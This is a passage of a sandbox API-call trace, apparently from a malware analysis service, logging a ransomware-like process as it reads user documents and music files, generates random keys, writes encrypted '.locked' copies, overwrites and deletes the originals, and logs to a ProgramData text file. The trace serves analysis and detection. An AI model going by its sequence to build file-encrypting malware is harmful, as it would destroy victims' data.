dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0304.555] GetConsoleMode (in: hConsoleHandle=0x180, lpMode=0x12667e94 | out: lpMode=0x12667e94) returned 0 [0304.556] WriteFile (in: hFile=0x180, lpBuffer=0x126d00c0*, nNumberOfBytesToWrite=0x57, lpNumberOfBytesWritten=0x12667e64, lpOverlapped=0x0 | out: lpBuffer=0x126d00c0*, lpNumberOfBytesWritten=0x12667e64*=0x57, lpOverlapped=0x0) returned 1 [0304.556] CloseHandle (hObject=0x180) returned 1 [0304.559] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\nRY0tYZ9Ff0noTxW-ck.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\nry0tyz9ff0notxw-ck.pptx")) returned 1 [0304.717] SetEvent (hEvent=0x1dc) returned 1 [0304.717] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0305.348] WriteFile (in: hFile=0x1e0, lpBuffer=0x13090000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x124a1e78, lpOverlapped=0x0 | out: lpBuffer=0x13090000*, lpNumberOfBytesWritten=0x124a1e78*=0xfa000, lpOverlapped=0x0) returned 1 [0305.378] CloseHandle (hObject=0x1e0) returned 1 [0305.426] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0305.662] SetEvent (hEvent=0x1f0) returned 1 [0305.663] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0305.711] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\eJiGd4u4uD5.pps" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\ejigd4u4ud5.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0305.711] GetConsoleMode (in: hConsoleHandle=0x1b0, lpMode=0x125d9d9c | out: lpMode=0x125d9d9c) returned 0 [0305.711] SetEvent (hEvent=0x190) returned 1 [0305.711] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0305.744] SetEvent (hEvent=0x1f0) returned 1 [0305.744] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0305.759] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1263e000*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x1239fa24, lpReserved=0x0 | out: lpBuffer=0x1263e000*, lpNumberOfCharsWritten=0x1239fa24*=0xb) returned 1 [0305.763] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\Y75tBvZHinL.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\y75tbvzhinl.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x224 [0305.763] GetConsoleMode (in: hConsoleHandle=0x224, lpMode=0x1239fd9c | out: lpMode=0x1239fd9c) returned 0 [0305.763] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\Y75tBvZHinL.pptx.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\y75tbvzhinl.pptx.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0305.792] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0306.007] GetConsoleMode (in: hConsoleHandle=0x19c, lpMode=0x1239fd9c | out: lpMode=0x1239fd9c) returned 0 [0306.007] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x125fc000 | out: pbBuffer=0x125fc000) returned 1 [0306.007] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12392020 | out: pbBuffer=0x12392020) returned 1 [0306.007] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702201 | out: pbBuffer=0x12702201) returned 1 [0306.007] WriteFile (in: hFile=0x19c, lpBuffer=0x1266f000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1239fd78, lpOverlapped=0x0 | out: lpBuffer=0x1266f000*, lpNumberOfBytesWritten=0x1239fd78*=0x80, lpOverlapped=0x0) returned 1 [0306.014] ReadFile (in: hFile=0x224, lpBuffer=0x1441a000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239fd68, lpOverlapped=0x0 | out: lpBuffer=0x1441a000*, lpNumberOfBytesRead=0x1239fd68*=0x7657, lpOverlapped=0x0) returned 1 [0306.017] WriteFile (in: hFile=0x19c, lpBuffer=0x1441a000*, nNumberOfBytesToWrite=0x7657, lpNumberOfBytesWritten=0x1239fd74, lpOverlapped=0x0 | out: lpBuffer=0x1441a000*, lpNumberOfBytesWritten=0x1239fd74*=0x7657, lpOverlapped=0x0) returned 1 [0306.031] ReadFile (in: hFile=0x224, lpBuffer=0x1441a000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239fd68, lpOverlapped=0x0 | out: lpBuffer=0x1441a000*, lpNumberOfBytesRead=0x1239fd68*=0x0, lpOverlapped=0x0) returned 1 [0306.031] CloseHandle (hObject=0x19c) returned 1 [0306.054] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0306.066] CloseHandle (hObject=0x224) returned 1 [0306.066] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0306.397] SetEvent (hEvent=0x1e8) returned 1 [0306.397] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0306.398] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0306.417] SetEvent (hEvent=0x1ac) returned 1 [0306.417] SetEvent (hEvent=0x21c) returned 1 [0306.417] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0306.470] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0306.475] SetEvent (hEvent=0x1b8) returned 1 [0306.475] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0306.611] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x125fc040*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x12669a24, lpReserved=0x0 | out: lpBuffer=0x125fc040*, lpNumberOfCharsWritten=0x12669a24*=0xb) returned 1 [0306.691] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\ncy0WD.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\ncy0wd.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0306.691] GetConsoleMode (in: hConsoleHandle=0x1b0, lpMode=0x12669d9c | out: lpMode=0x12669d9c) returned 0 [0306.691] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\ncy0WD.pptx.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\ncy0wd.pptx.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0306.776] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0306.798] GetConsoleMode (in: hConsoleHandle=0x1f4, lpMode=0x12669d9c | out: lpMode=0x12669d9c) returned 0 [0306.798] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x125fc000 | out: pbBuffer=0x125fc000) returned 1 [0306.798] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8010 | out: pbBuffer=0x124a8010) returned 1 [0306.798] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12714181 | out: pbBuffer=0x12714181) returned 1 [0306.798] WriteFile (in: hFile=0x1f4, lpBuffer=0x12623000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12669d78, lpOverlapped=0x0 | out: lpBuffer=0x12623000*, lpNumberOfBytesWritten=0x12669d78*=0x80, lpOverlapped=0x0) returned 1 [0306.801] ReadFile (in: hFile=0x1b0, lpBuffer=0x13952000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12669d68, lpOverlapped=0x0 | out: lpBuffer=0x13952000*, lpNumberOfBytesRead=0x12669d68*=0x435e, lpOverlapped=0x0) returned 1 [0306.803] WriteFile (in: hFile=0x1f4, lpBuffer=0x13952000*, nNumberOfBytesToWrite=0x435e, lpNumberOfBytesWritten=0x12669d74, lpOverlapped=0x0 | out: lpBuffer=0x13952000*, lpNumberOfBytesWritten=0x12669d74*=0x435e, lpOverlapped=0x0) returned 1 [0306.881] ReadFile (in: hFile=0x1b0, lpBuffer=0x13952000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12669d68, lpOverlapped=0x0 | out: lpBuffer=0x13952000*, lpNumberOfBytesRead=0x12669d68*=0x0, lpOverlapped=0x0) returned 1 [0306.882] CloseHandle (hObject=0x1f4) returned 1 [0306.941] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0307.084] SetEvent (hEvent=0x1b8) returned 1 [0307.084] CloseHandle (hObject=0x1b0) returned 1 [0307.085] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0307.094] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0307.111] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0307.295] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\aLqbOAns.odp" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\alqboans.odp"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0307.303] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0307.326] SetEvent (hEvent=0x150) returned 1 [0307.326] SetEvent (hEvent=0x214) returned 1 [0307.326] GetConsoleMode (in: hConsoleHandle=0x208, lpMode=0x125dce88 | out: lpMode=0x125dce88) returned 0 [0307.326] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0307.572] WriteFile (in: hFile=0x208, lpBuffer=0x1421c000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125dce78, lpOverlapped=0x0 | out: lpBuffer=0x1421c000*, lpNumberOfBytesWritten=0x125dce78*=0xfa000, lpOverlapped=0x0) returned 1 [0307.604] CloseHandle (hObject=0x208) returned 1 [0307.635] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\aLqbOAns.odp" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\alqboans.odp")) returned 1 [0307.654] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c220*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x12663a24, lpReserved=0x0 | out: lpBuffer=0x1234c220*, lpNumberOfCharsWritten=0x12663a24*=0xb) returned 1 [0307.662] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\AnJCv.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\anjcv.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0307.663] GetConsoleMode (in: hConsoleHandle=0x200, lpMode=0x12663d9c | out: lpMode=0x12663d9c) returned 0 [0307.663] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\AnJCv.mp3.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\anjcv.mp3.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0307.675] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x12663d9c | out: lpMode=0x12663d9c) returned 0 [0307.675] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1234c240 | out: pbBuffer=0x1234c240) returned 1 [0307.675] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8050 | out: pbBuffer=0x124a8050) returned 1 [0307.675] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702401 | out: pbBuffer=0x12702401) returned 1 [0307.676] WriteFile (in: hFile=0x1c8, lpBuffer=0x1265b000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12663d78, lpOverlapped=0x0 | out: lpBuffer=0x1265b000*, lpNumberOfBytesWritten=0x12663d78*=0x80, lpOverlapped=0x0) returned 1 [0307.679] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x1) returned 0x0 [0307.680] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x336afb30, ulCount=0x10, ulNumEntriesRemoved=0x336afb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x336afb30, ulNumEntriesRemoved=0x336afb10) returned 0 [0307.681] SetEvent (hEvent=0x150) returned 1 [0307.681] SetEvent (hEvent=0x14c) returned 1 [0307.681] SetEvent (hEvent=0x184) returned 1 [0307.681] ReadFile (in: hFile=0x200, lpBuffer=0x1685a000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12663d68, lpOverlapped=0x0 | out: lpBuffer=0x1685a000*, lpNumberOfBytesRead=0x12663d68*=0x10bfb, lpOverlapped=0x0) returned 1 [0307.685] WriteFile (in: hFile=0x1c8, lpBuffer=0x1685a000*, nNumberOfBytesToWrite=0x10bfb, lpNumberOfBytesWritten=0x12663d74, lpOverlapped=0x0 | out: lpBuffer=0x1685a000*, lpNumberOfBytesWritten=0x12663d74*=0x10bfb, lpOverlapped=0x0) returned 1 [0307.693] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0307.992] ReadFile (in: hFile=0x200, lpBuffer=0x1685a000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12663d68, lpOverlapped=0x0 | out: lpBuffer=0x1685a000*, lpNumberOfBytesRead=0x12663d68*=0x0, lpOverlapped=0x0) returned 1 [0307.992] CloseHandle (hObject=0x1c8) returned 1 [0307.995] CloseHandle (hObject=0x200) returned 1 [0307.995] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0307.995] GetConsoleMode (in: hConsoleHandle=0x200, lpMode=0x12663e94 | out: lpMode=0x12663e94) returned 0 [0307.995] WriteFile (in: hFile=0x200, lpBuffer=0x12348210*, nNumberOfBytesToWrite=0x2b, lpNumberOfBytesWritten=0x12663e64, lpOverlapped=0x0 | out: lpBuffer=0x12348210*, lpNumberOfBytesWritten=0x12663e64*=0x2b, lpOverlapped=0x0) returned 1 [0307.995] CloseHandle (hObject=0x200) returned 1 [0307.997] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\AnJCv.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\anjcv.mp3")) returned 1 [0308.122] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x336afb30, ulCount=0x10, ulNumEntriesRemoved=0x336afb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x336afb30, ulNumEntriesRemoved=0x336afb10) returned 0 [0308.122] SetEvent (hEvent=0x198) returned 1 [0308.122] SetEvent (hEvent=0x190) returned 1 [0308.141] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\AnJCv.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\anjcv.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0308.351] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0308.368] GetConsoleMode (in: hConsoleHandle=0x1c0, lpMode=0x12663e88 | out: lpMode=0x12663e88) returned 0 [0308.368] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x1) returned 0x0 [0308.371] SetEvent (hEvent=0x220) returned 1 [0308.371] SetEvent (hEvent=0x1f0) returned 1 [0308.371] SetEvent (hEvent=0x104) returned 1 [0308.371] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0308.373] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x336afb34, ulCount=0x10, ulNumEntriesRemoved=0x336afb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x336afb34, ulNumEntriesRemoved=0x336afb14) returned 0 [0308.373] SetEvent (hEvent=0x150) returned 1 [0308.373] SetEvent (hEvent=0x104) returned 1 [0308.373] SetEvent (hEvent=0x1f0) returned 1 [0308.411] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\tONZR0L5XBEql C.odt" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\tonzr0l5xbeql c.odt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0308.544] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0308.552] GetConsoleMode (in: hConsoleHandle=0x180, lpMode=0x125e7e88 | out: lpMode=0x125e7e88) returned 0 [0308.552] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0308.753] SetEvent (hEvent=0x214) returned 1 [0308.753] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0308.754] SetEvent (hEvent=0x220) returned 1 [0308.755] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0308.770] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x125fc000*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x12663a24, lpReserved=0x0 | out: lpBuffer=0x125fc000*, lpNumberOfCharsWritten=0x12663a24*=0xc) returned 1 [0308.772] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\6GLhCUHar.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\6glhcuhar.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0308.772] GetConsoleMode (in: hConsoleHandle=0x1b0, lpMode=0x12663d9c | out: lpMode=0x12663d9c) returned 0 [0308.772] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\6GLhCUHar.mp3.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\6glhcuhar.mp3.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0309.407] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0309.414] GetConsoleMode (in: hConsoleHandle=0x180, lpMode=0x12663d9c | out: lpMode=0x12663d9c) returned 0 [0309.414] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x1) returned 0x102 [0309.415] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0309.415] SetEvent (hEvent=0x198) returned 1 [0309.415] SetEvent (hEvent=0x134) returned 1 [0309.415] SetEvent (hEvent=0x14c) returned 1 [0309.415] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0309.426] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x336afb34, ulCount=0x10, ulNumEntriesRemoved=0x336afb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x336afb34, ulNumEntriesRemoved=0x336afb14) returned 0 [0309.426] SetEvent (hEvent=0x150) returned 1 [0309.426] SetEvent (hEvent=0x14c) returned 1 [0309.426] SetEvent (hEvent=0x134) returned 1 [0309.427] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\A_ vsPrHANVz-cnbD2\\dxPjxFmWasQOiEbDV.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\a_ vsprhanvz-cnbd2\\dxpjxfmwasqoiebdv.wav"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0309.429] GetConsoleMode (in: hConsoleHandle=0x1f4, lpMode=0x125e3e88 | out: lpMode=0x125e3e88) returned 0 [0309.429] WriteFile (in: hFile=0x1f4, lpBuffer=0x13578000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125e3e78, lpOverlapped=0x0 | out: lpBuffer=0x13578000*, lpNumberOfBytesWritten=0x125e3e78*=0xfa000, lpOverlapped=0x0) returned 1 [0309.451] CloseHandle (hObject=0x1f4) returned 1 [0309.477] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\A_ vsPrHANVz-cnbD2\\dxPjxFmWasQOiEbDV.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\a_ vsprhanvz-cnbd2\\dxpjxfmwasqoiebdv.wav")) returned 1 [0309.526] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0309.541] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0309.542] SetEvent (hEvent=0x1e8) returned 1 [0309.542] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0309.543] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c200*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x125e5a24, lpReserved=0x0 | out: lpBuffer=0x1234c200*, lpNumberOfCharsWritten=0x125e5a24*=0xc) returned 1 [0309.554] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0309.618] SetEvent (hEvent=0x1ac) returned 1 [0309.618] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0309.619] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0309.630] SetEvent (hEvent=0x104) returned 1 [0309.630] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c2c0*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x123a1a24, lpReserved=0x0 | out: lpBuffer=0x1234c2c0*, lpNumberOfCharsWritten=0x123a1a24*=0xc) returned 1 [0309.641] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0309.937] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\8261.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\8261.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0309.938] GetConsoleMode (in: hConsoleHandle=0x200, lpMode=0x123a1d9c | out: lpMode=0x123a1d9c) returned 0 [0309.938] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\8261.mp3.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\8261.mp3.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x224 [0309.939] GetConsoleMode (in: hConsoleHandle=0x224, lpMode=0x123a1d9c | out: lpMode=0x123a1d9c) returned 0 [0309.939] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1234c200 | out: pbBuffer=0x1234c200) returned 1 [0309.939] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x1234e060 | out: pbBuffer=0x1234e060) returned 1 [0309.939] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12340281 | out: pbBuffer=0x12340281) returned 1 [0309.939] WriteFile (in: hFile=0x224, lpBuffer=0x12649000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x123a1d78, lpOverlapped=0x0 | out: lpBuffer=0x12649000*, lpNumberOfBytesWritten=0x123a1d78*=0x80, lpOverlapped=0x0) returned 1 [0309.942] ReadFile (in: hFile=0x200, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x123a1d68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x123a1d68*=0x4985, lpOverlapped=0x0) returned 1 [0309.943] WriteFile (in: hFile=0x224, lpBuffer=0x12770000*, nNumberOfBytesToWrite=0x4985, lpNumberOfBytesWritten=0x123a1d74, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesWritten=0x123a1d74*=0x4985, lpOverlapped=0x0) returned 1 [0310.009] ReadFile (in: hFile=0x200, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x123a1d68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x123a1d68*=0x0, lpOverlapped=0x0) returned 1 [0310.009] CloseHandle (hObject=0x224) returned 1 [0310.010] CloseHandle (hObject=0x200) returned 1 [0310.010] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0310.010] GetConsoleMode (in: hConsoleHandle=0x200, lpMode=0x123a1e94 | out: lpMode=0x123a1e94) returned 0 [0310.011] WriteFile (in: hFile=0x200, lpBuffer=0x126ae1e0*, nNumberOfBytesToWrite=0x54, lpNumberOfBytesWritten=0x123a1e64, lpOverlapped=0x0 | out: lpBuffer=0x126ae1e0*, lpNumberOfBytesWritten=0x123a1e64*=0x54, lpOverlapped=0x0) returned 1 [0310.011] CloseHandle (hObject=0x200) returned 1 [0310.011] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\8261.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\8261.mp3")) returned 1 [0310.100] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x336afb30, ulCount=0x10, ulNumEntriesRemoved=0x336afb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x336afb30, ulNumEntriesRemoved=0x336afb10) returned 0 [0310.101] SetEvent (hEvent=0x12c) returned 1 [0310.101] SetEvent (hEvent=0x1e8) returned 1 [0310.101] SetEvent (hEvent=0x198) returned 1 [0310.110] CreateFileW 